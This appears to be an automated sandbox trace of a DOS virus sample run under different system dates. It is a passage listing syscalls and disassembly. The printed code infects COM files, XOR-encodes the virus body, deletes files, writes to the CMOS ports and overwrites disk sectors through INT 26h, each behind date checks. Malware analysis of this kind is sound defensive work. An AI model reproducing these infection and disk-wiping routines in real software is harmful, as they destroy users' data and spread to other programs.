0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.509455283Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:56.518268809Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs
2018-12-25T12:41:56.520291403Z 9 PC: 12b88 | Display string (Could not find end pointer)

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.204911105Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:56.220185278Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:56.221508426Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:56.222909719Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.229048972Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.236120041Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.242962218Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.244561093Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.247471923Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.258583144Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.267549842Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.270497852Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.284543631Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.292541305Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.296387175Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.303039943Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.309404605Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.311838359Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.313655375Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.316505714Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.318489048Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.321411784Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.342892249Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.351050669Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.353580996Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.357617883Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.36427903Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.366622967Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.368281496Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.371086959Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.37391883Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.376766936Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.385018425Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.393448419Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.396985284Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.403780855Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.421128441Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.422622162Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.424058279Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.427815646Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.42940354Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.43205369Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.445766326Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.454015345Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.456814271Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.463770748Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.467702961Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.46870308Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.469801947Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.471891621Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.472987061Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.475299741Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.482125199Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.488421953Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.489829952Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.492448941Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.494525463Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.496748878Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:56.502651839Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.239921682Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:56.241599393Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:56.243973268Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:56.245158753Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.251886721Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.259747207Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.267202358Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.269107497Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.271670233Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.275138393Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:56.277314955Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.288872364Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.30477898Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.315503396Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.318748272Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.326594374Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.333977742Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.335894981Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.33877933Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.341840225Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.343497585Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.34679588Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.356382241Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.367784252Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.372065596Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.379864781Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.387824292Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.390807203Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.392671376Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.39623457Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.400278108Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.404592488Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.415127647Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.426878339Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.430261194Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.438319886Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.446240207Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.449389399Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.451480826Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.456347742Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.459901804Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.462653189Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.471511031Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.481100517Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.484250154Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.492103691Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.501181896Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.503256383Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.505279683Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.509345369Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.512020101Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.515588847Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.527380453Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.538313983Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:56.53959697Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:56.542013189Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:56.545240686Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:56.54804267Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs